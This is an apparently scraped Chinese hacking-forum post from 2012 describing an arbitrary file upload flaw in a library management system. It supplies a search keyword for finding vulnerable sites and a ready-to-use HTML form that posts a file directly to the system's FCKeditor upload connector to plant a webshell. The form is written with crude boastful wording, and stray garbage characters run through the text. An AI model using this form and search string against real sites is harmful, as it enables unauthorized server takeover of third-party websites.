主题:图书馆系统任意文件上传漏洞
/ [2 T( e' B' q" X, e 作者:冰锋刺客* _/ v. ]3 F& O% i: L; m
厂商:点击书(dianjishu.com)/ g& ` H1 U, e# C, b! |! l l
日期:2012-6-21
1 H1 H# i, M: X' C+ o
/ v; O$ k0 U r" i( v6 iI 概述
6 }- B9 h7 k8 o; { 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell9 @& Y) j) l4 _/ Z& A* y9 ^) C
II 简介& y, n* u2 }- f; w0 X0 U$ O% D% l7 d
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 k" @- H) V5 S 补充一个漏洞3 C8 c& }* f/ o, n
<form id="frmUpload" enctype="multipart/form-data", J, M$ W+ `9 v! c6 r% }
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>1 x7 ]: ~$ a; k! Q$ Q9 ~1 S/ k
<input id="btnUpload" type="submit" value="操翻他">. Q4 e4 m' D9 e
</form>6 u! n& F, O$ O# b! D
你们懂的
/ S8 Q, W+ d" A7 T4 u 那傻逼提供还需要改包.
% U$ ?! d: c: k0 V! z ?- H& m 自己看了下源代码发现fckeditor5 j9 O4 e+ Z) n: y$ z# {. m
直接秒杀
9 f0 B1 F6 V0 v |
发表于 2012-9-10 21:20:59
收藏
支持
反对